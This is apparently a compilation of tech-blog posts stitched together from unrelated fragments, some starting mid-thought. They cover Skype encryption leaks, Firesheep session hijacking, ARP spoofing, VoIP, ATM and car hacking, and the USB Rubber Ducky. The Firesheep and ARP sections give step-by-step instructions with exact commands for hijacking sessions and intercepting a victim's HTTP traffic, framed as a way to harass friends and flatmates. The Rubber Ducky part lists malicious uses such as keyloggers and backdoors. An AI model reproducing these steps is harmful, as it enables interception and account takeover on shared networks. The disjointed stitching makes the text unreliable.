Here is a video that actually explains the indepth details of How PS3 Hacks have worked in the past, and what’s the new fail0verflow Hack is about.

Stay tuned to this article and Taranfx.com we will be updating it as more info is available.

If you are looking for Jailbreaking guides:

• Jailbreak your PS3 with Android Phone
• DIY Open Source PS3 Jailbreak allows Unsigned Apps, Games
• HowTo Jailbreak, Mod PS3 Slim, Fat
• PS3 USB mod Chip: Backup Games on HDD

For latest Gaming, iPhone, android, Tech news @taranfx on Twitter and you can also subscribe to use below:

Encryption was so good that almost no one has been able to reverse engineer it out of the numerous Skype binaries. Those who claimed to have actually get through, failed to release it publicly. It was all shadowed until someone released the complete Obfuscation algorithm to the web in Plain C code.

The complete source code is available at http://cryptolib.com/ciphers/skype . On carefully analyzing the code, one can come to the conclusion that the greatest secret of Skype communication protocol, is in obfuscated Skype RC4 key expansion algorithm.

The leak actually happened a couple of months ago. Within few weeks of the leak, the code was being used by hackers & spammers.  A better thing was to make the algorithm available to IT security Gurus as publication will help the IT security community help secure Skype better.

There is plenty of good cryptography in Skype. Most of it is implemented properly too. There are seven types of communication encryption in Skype: its servers use AES-256, the supernodes and clients use three types of RC4 encryption – the old TCP RC4, the old UDP RC4 and the new DH-384 based TCP RC4, while the clients also use AES-256 on top of RC4.

I tried to analyze the code, trust me its really complicated, really rocket science of Cryptography.

Stay tuned for more on Latest in tech, Security, Android, iPhone, Programming and Tech news via @taranfx on Twitter or:

Its now as easy as that with a a Firefox extension called Firesheep which can  hijack a person’s current user-session over an open Wi-Fi connection.

Firesheep is a work of  Eric Butler who made the proof oc concept public after after presenting at a Security event. The purpose of the experiment was to showcase the security risks associated with session hijacking, aka sidejacking.

So what all can be hacked with Firesheep? Nearly  26 online services, which includes all popular online services: Amazon, Facebook, Foursquare, Google, The New York Times, Twitter, Windows Live, WordPress and Yahoo.

The extension is so flexible that it can be customized to allow a hacker to target other Websites not listed by Firesheep.

While Firesheep sounds scary, its not as scary as it may sound first. Even though the extension is downlaoded more than 100,000 times, there’s nothing to be scared of.

How Firesheep works

Firesheep is basically a packet sniffer that can analyze all the unencrypted Web traffic on an open Wi-Fi connection between a Wi-Fi router and the personal computers on the same network. The extension polls around network for someone to log in, when someone does, browser’s site-specific cookie communicates with the site and contains personally identifying information such as your user name and an site specific session ID.

As victim’s browser swaps cookie information back and forth with the Website, our packet sniffer can capture this information and hijack the session. Coz cookies has no password information and it  has session timeout, it does eventually. But on a serious ote, even temporary access to the account can bring havocs.

How to use Firesheep

Install WinPcap on windows (Mac Os doesn’t need this) and get the Firesheep extension and then open it up by clicking on View>Sidebars>Firesheep. Click the button that says “Start Capturing.”

Once you click the button, it starts snooping. Then onwards all sessions that are captured are automatically displayed

How to Bypass Firesheep Hijacks?

1. If you feel your account has been compromised, immidiately logout. As soon as you do that, hijacked cookie becomes invalid, and no longer can be mis-used.
2. Use A VPN: Try using a Virtual Private Network client such as the free version of HotSpot Shield. This piece of software basically creates a secure tunnel for your data that runs between the Wi-Fi router and your computer.
3. USe HTTPS Everywhere: If you’re a Firefox user you can also use extensions such as HTTPS Everywhere built by the Electronic Frontier Foundation. This extension forces certain Websites to use a secure SSL connection for your entire browsing session instead of just the login.
4. Use Strict Transport Security (STS): Strict Transport Security (STS) is a relatively new security feature that is starting to appear in some browsers. STS automatically forces your browser to make a secure connection with every Web page that supports SSL encryption. Once you start using STS, you will not be able to use an insecure connection ever again when connecting to a specific site such as Facebook or Amazon. Chrome has supported STS since Chrome 4, and Firefox 4 will include STS when the official version launches in the coming months.
5. Encrypt your home/office network:  Use the strongest possible encryption on your Home and office Wifi connections.  WPA2 is much better than WEP.

How to hijack/ capture/ Sniff HTTP traffic

We will be using ARP and iptables on a Linux machine to accomplish most of the stuff. It’s an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.

Warning: Do not attempt to do this on a Public Wifi or a Corporate Wifi. Doing so could lead you to serious consequences. In no way is Taranfx responsible for any harms. This is solely intended for fun @ home.

Lets take 3 PCs into reference for our activity:

• Real gateway router: IP address 192.168.0.1, MAC address 48:5d:34:aa:c6:aa
• Fake gateway: A Laptop PC called hacker-laptop, IP address 192.168.0.200, MAC address c0:30:2b:47:ef2:74
• Victim: a laptop on wireless called victim-laptop, IP address 192.168.0.111, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains.

Step 1: Enable IPv4 forwarding
Unless IP forwarding is enabled, hacker-laptop won’t receive all the network traffic because the networking subsystem is going to ignore packets that aren’t destined for us. So step 1 is to enable IP forwarding. To enable it, set a non zero value like:

root@hacker-laptop:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Set routing rules
We want to set rules so that all traffic routes through hacker-laptop, acting like a NAT router. Just like a typical NAT, it would  rewrite the destination address in the IP packet headers to be its own IP address.

This can be done as follows:

tarranfx@hacker-laptop:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp –dport 80 -j NETMAP –to 192.168.0.200

The iptables command has 3 components:

• When to apply a rule (-A PREROUTING)
• What packets get that rule (-p tcp –dport 80)
• The actual rule (-t nat … -j NETMAP –to 192.168.0.200)

What above command does: If you’re a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.0.200, the destination, NATting both ways so this is transparent to the source.”

Step 3: Adding IP adddress to interface
The networking subsystem will not allow you to ARP for a random IP address on an interface — it has to be an IP address actually assigned to that interface:

taranfx@hacker-laptop:~$ sudo ip addr add 192.168.0.1/24 dev eth0

and verify that the original IP address 192.168.0.200, and the gateway address 192.168.0.1.

taranfx@hacker-laptop:~$ ip addr
…
3: eth0: mtu 1500 qdisc noqueue state UNKNOWN
link/ether c0:30:2b:47:ef2:74 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.200/24 brd 192.168.1.255 scope global eth0
inet 192.168.0.1/24 scope global secondary eth0
inet6 fe80::230:1bff:fe47:f274/64 scope link
valid_lft forever preferred_lft forever
…

Step 4: Responding to HTTP requests
hacker-laptop would need a HTTP server setup. t could be any damn server, I used Apache for ease of use. Here you can get creative, e.g. respond with random pages for specific URLs or define a local URL e.g. http://fun

Step 5: Test pretending to be the gateway
Most of the things are already done and our hacker-laptop is ready to pretend as the Wifi Gateway, but the trouble is convincing victim-laptop that the MAC address for the gateway has changed, to that of hacker-laptop.

The solution is to send a Gratuitous ARP, which says “I know nobody asked, but I have the MAC address for 192.168.0.1”. Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.0.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP.
There are lots of command line utilities and bindings in various programming language that make it easy to issue ARP packets. I used the arping tool:

taranfx@hacker-laptop:~$ sudo arping -c 3 -A -I eth0 192.168.0.1

We’ll send a Gratuitous ARP reply (-A), three times (-c -3), on the eth0 interface (-l eth0) for IP address 192.168.0.1.

This can be then verified on the victim’s machine using “arp -a” command

Bingo! victim-laptop now thinks the MAC address for IP address 192.169.1.1 is 0:30:1b:47:f2:74, which is hacker-laptop’s address.
If I try to browse the web on victim-laptop, I am served the resource matching the rules in hacker-laptop’s web server.

That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when hacker-laptop gets the DNS resolution requests for Google.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet:

The fact is that hacker-laptop has rerouted and served the request is totally transparent to the client at the IP layer and victim-laptop has no clue.

Undo the changes

So, you had enough fun and wish to revert? Here we go:

taranfx@hacker-laptop:~$ sudo ip addr delete 192.168.0.1/24 dev eth0
taranfx@hacker-laptop:~$ sudo iptables -t nat -D PREROUTING -p tcp –dport 80 -j NETMAP –to 192.168.0.200

To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d 192.168.0.1, or bring your interfaces down and back up.

We write about Latest in tech, Google,  iPhone, Gadgets, Open Source, Programming. Grab them all @taranfx on Twitter or below:

IP Video conference can be easily hacked using a freeware tool that allows attackers to monitor calls in real-time and record Video files.

The original exploit was first demonstrated more than a year ago, but sadly, most corporate networks are still vulnerable to it, says Jason Ostrom, director of VIPER Lab at VoIP vendor Sipera, where he performs penetration tests on clients’ business VoIP networks.

He says he sees only 5% of these networks are properly configured to block this attack, which can yield audio and video files of entire conversations. “I almost never see encryption turned on,” he says.

Only about one in 20 organizations secures its IP video with encryption or other measures, according to Sipera’s research, so IP video is ripe for attack. Ostrom and fellow researcher Arjun Sambamoorthy used a pair of homegrown open-source tools to perform the hacks at Defcon, which performs video eavesdropping, and VideoJak, which intercepts and replays video.

However, the attacker needs physical access to the IP network to execute these hacks, the researchers say, as well as access to a VLAN port on which the video application resides.

Ostrom demonstrated the attack at the Forrester Security Forum in Boston last week using a Cisco switch, two Polycom videophone and a laptop armed with a hacking tool called UCSniff that he pulled together from open source tools.

How VoIP, IP video hack works

Hacker needs to get access to a VoIP phone jack to which he plugs a laptop with the hacking tool- UCSniff. Using address-resolution protocol (ARP) spoofing, the device gathers the corporate VoIP directory, giving the hacker the ability to keep an eye on any phone and to intercept its calls. There’s a tool within UCSniff called ACE that simplifies capturing the corporate directory.

Once intercepted, the audio and video from the targeted call flow through the laptop, where it can be viewed as it streams by and also where it is recorded in separate files, one for each end of the conversation, Ostrom says.

They used UCSniff to record a ‘safe’ video stream, then converted it to an AVI file. Then we used the VideoJak tool that also supports man-in-the-middle,” he says. VideoJak intercepts the video stream, and replaces it with a malicious or phony video payload.

So, for instance, a bad guy could replace a surveillance feed of his breaking into the CEO’s office with a routine clip trained on the office door, with no sign of the break-in.

How to Prevent VoIP, Video Conference Hacking?

The strongest answer — apply Encryption for both signaling and media. The problem isn’t with the networking or VoIP and video gear itself, but rather with how they are configured in the network.

The scary thing is, 70% of the networks tested by pen-testers are vulnerable to toll fraud attacks that use the corporate network as a proxy for make long distance calls.

We write about Latest in tech, Apple, iPhone, Android, Tablets, Gadgets, Open Source, Programming. Grab them@taranfx on Twitter or below:

But as the time evolved, those methods became obsolete and hardly few of those  hacks still persist and the ones that remain in sight are relative harder and un-popular.

With the latest Hack, as demoed at BlackHat conference, it can get pretty easy. Barnaby Jack, director of security testing at Seattle-based IOActive,  brought two ATMs onto the Black Hat conference stage and demonstrated that with a press of a button, ATM machine is spits out its cash till the last one in the Pile.

“I hope to change the way people look at devices that from the outside are seemingly impenetrable,” said Jack. He demonstrated a hack that allows the hacker to connect to the ATM through a telephone modem and, without knowing a password, instantly force it to bankrupt the ATM machine.

How the Hacking started

Initially, in order to kick start hacking, Jack said that he had bought a pair of standalone ATMs–one from  Tranax Technologies (yea, its not Taranfx) and the other by Triton. His study yielded success in within few years, during which he discoverred Vulnerabilities that had let him gain complete access to those machines.

Jack seems to be so confident about his technique that he said, “Every ATM I’ve looked at, I’ve found a game-over vulnerability that allows an attacker to get cash from the machine” .

On the good note, he had been an Ethical hacker and hence had brought up vulnerabilties to the notice of both ATM companies and was fixed an year ago. However, theres a twist to the tstory. These updates were pushed to ATMs which had been under support from the companies, not every ATM had been updated, hence,  a large number of the machines remain vulnerable.

Hacking ATMs: Now & then

Hacking ATMs had been popular under two techniques known as “card skimming” and “card trapping” which are now relatively uncommon coz these electronic cash-extraction techniques were limited because they didn’t rely on a deep analysis of an ATM’s code.

We got to knew what exactly happened when Cybercriminals hacked into Bank ATMs in Eastern Europe.

Most modern ATMs run on Windows CE with an ARM processor and use a dialup or leased-line connection to connect to the other branches over the interent/Intranet VPNs, ost of which is through a serial port connection. Jack used standard debugging techniques to interrupt the normal boot process and instead start Internet Explorer, and using some nasty IE hacks, he got access to the file system for copying off the files for analysis.

A remote access vulnerability was found to occur on Taranax ATMs, that allows full access to the machine, without password. The Hack uses two softwares: a utility called Dillinger, which attacks an ATM remotely, and one called Scrooge, a rootkit that inserts a backdoor and then conceals itself from discovery. Scrooge “hides itself from the process list, hides itself from the operating system, there’s a hidden pop-up menu that can be activated by a special key sequence or a custom card.”

For Triton’s ATMs, scenario was different. PC motherboard that dispenses cash from the vault was protected only by a standard (shared) key that could be purchased over the Internet for about $10. So Jack found out that he could force the machine to accept his backdoor-enabled software as a legitimate update, which then can do the damage thats irreversible.

Both companies have responded to the hacks, but necessary actions may still not have been taken place to fix all the machines. I just hope someone takes care of this sometime soon.

The difficult part in hacking the ATMs is evaluating the software for vulnerabilities, but once some one like Jack  creates it, its a childsplay to empty the machine.

We write about Google, Twitter, Security, Open Source, Programming, Web, Apple, iPhone,Android and latest in Tech @taranfx on Twitter or by subscribing below:

In a paper[ by autosec], the security researchers claim that by connecting to a standard diagnostic computer port included in late-model cars, they were able to do some Really nasty things, such as turning off the brakes, changing the speedometer reading, wishfully blowing hot air or music on the radio, and even locking passengers in the car.

Stefan Savage, an associate professor with the UoC, describes the real-world risk of any of the attacks they’ve worked out as extremely low. An attacker would have to have sophisticated programming abilities and also be able to physically mount some sort of computer on the victim’s car to gain access to the embedded systems. But as they look at all of the wireless and Internet-enabled systems the auto industry is dreaming up for tomorrow’s cars, they see some serious areas for concern.

Obviously, if there’s no action taken on the part of all the relevant stakeholders, then I think there might be a reason to be concerned.Researchers found existing automotive systems to be tremendously vulnerable to easy hacks.

The Car hacking is all cooked with Controller Area Network (CAN) system, mandated as a diagnostic tool for all U.S. cars built (2008 onwards). The concept is simple: they developed a sniffer called CarShark that listens in on CAN traffic as it’s sent about the onboard network, and then inject their own packets. By learning the complete protocol of the car’s controls, its not hard to control almost anything from radio to popping car’s trunk.

A lot of it is done with Brute-force too: The specific jargon is called “fuzzing” — where they simply bombard a large number of random packets at a component and analyze the response.

In addition, the researchers found that they could change the firmware on some systems without any sort of authentication. In another attack called “Self-destruct”  a 60 second countdown is shown on the driver’s dashboard with  clicks, when the time hits zero, the car’s engine is killed and the doors are locked. To give you an idea of how simple it is, it was done with less than 200 lines of code — and  most of it devoted to keeping time during the countdown.

This clearly shows how vulnerable these softwares are. Car manufacturers are introducing some great features into modern cars though, falling back on security. These manufacturers should start worrying about security more than anything else or in future someone else might take over control, while you are on the way.

Update: Hackers Hack Car with Music

[via nww]

We write about Google, Twitter, Security, Open Source, Programming, Web, Apple, iPhone,Android and latest in Tech @taranfx on Twitter or by subscribing below:

Trojans, viruses, malware are everywhere. They find new ways to enter our sacred computers some way or the other. Talking about scenarios where hacker had physical access, traditionally, lame Autorun based USBs could install unwanted programs on your PCs the moment they are plugged, but those are easy to get rid of: Switch off autoplay. What if a USB uses a cross-platform native profile to inject malicious programs into computers? — It becomes unstoppable.

One such device was demoed at this year’s Shmoocon, it’s called “Phantom Keystroker”. It’s a simple USB dongle form factor device, which when plugged to a computer uses USB HID class to identify itself as a Human interface mouse and keyboard from a  legit manufacturer and start execution of instructions, which would perhaps annoy the user by flashing LEDs on keyboards, and make the mouse behave as drunkard.

Since USB HID doesn’t need any drivers across all popular platforms (Linux, Windows, Mac OS), it just works everywhere.

Hak5 team has extrapolated the idea with USB HID device to allow executing terminal commands quickly, without drawing as much attention from the user who sits in front of it. The user just turns his head for couple of seconds and  the hacker plugs in their programmable USB key stroke dongle, Boom! All sorts of command could be run.

Why this behavior is Not considered “Bad” by Current Anti-viruses

When we plug-in such USB HID device, it acts just like any other USB peripheral. It could identify itself as aLogitech HID keyboard, or a HID compliant Mouse. The moment it identifies itself, your computer assumes its you who is typing/clicking and has no idea about “these devices” being automated.

Daren and Snubs from Hak5 had been working on such a project they call as “USB Rubber Ducky” with a soft duck attached at the Dongle.

How this can be done?

It could start with a cool Arduino hack, but implementing a USB HID with the standard Arduino is a bit of a pain (atleast for me). The alternative way (read  as “Better”)  is to use Teensy, which lets you program  in C, or the easier Arduino development environment, and already supported USB HID out of the box! With the price tag of  $18, its ultra-affordable for enthusiasts and nightmare for potential victims.

When teensy is interfaced with a flash card, it could store multiple programs, which can then be dynamically loaded instead of reflashing the device everytime when you need to perform a different task. Also, one can store a large number of files/scripts that let you do more.

Watch the Video, from Hak5: (video automatically starts from 12:xx, where main talk starts)

The possiblities are endless. You can create a CRON Job or schedule events to happen in a later time. e.g. running a script at a time in the future when it downloads and install a keylogger or perhaps damage/steal local files. Or it could be an instantaneous Auto-job that copies all executables from the USB flash for running on the local computer.

What other Bad things are Possible:

• Automate Brute-force Admin passwords on Windows server (Windows 2003 server doesn’t lockout when passwords are entered from keyboard, in our case USB HID device)
• Brute-force BIOS passwords
• Fake a BSOD and do anything in the background. Before User reboots PC (i.e. couple of seconds) damage is probably done.
• Add a user to the box or the domain.( this is nasty)
• Run a program that sets up a permanent back door.
• Copy files to flash card
• Go to a website they have a cookie for, and do some sort of transaction.

Possibilities are endless, use your wild imagination.

How about Good things?

Apart from being an un-avoidable bad element, it can be a great pen-tester’s device and even an automation device. It could:

• Automate Pen-testing tasks
• Perform certain tasks much faster than you can type, and that too without typos.
• Schedule tasks

Potential Shortcomings?

There is one disadvantage, though its not big. The first time you plugin the device, it takes few seconds (5-20s) to identify HID device and load the drivers. Though this is fully automated by all operating systems, this delay varies from OS to OS.

You can contribute

Obviously, there can be other good reasons why this project should go futher. If you’ve some brilliant ideas and happen to be a strong C, Arduino programmer, you can contribute to this project by filling a form at hak5 to register to receive a Free USB Rubber Ducky dev kit. Devkits will be delivered via via snail-mail around the world.

Related: Arduino Alternative : Android based DIY projects

We write about Google, Twitter, Security, Open Source, Programming, Web, Apple, iPhone,Android and latest in Tech @taranfx on Twitter or by subscribing below: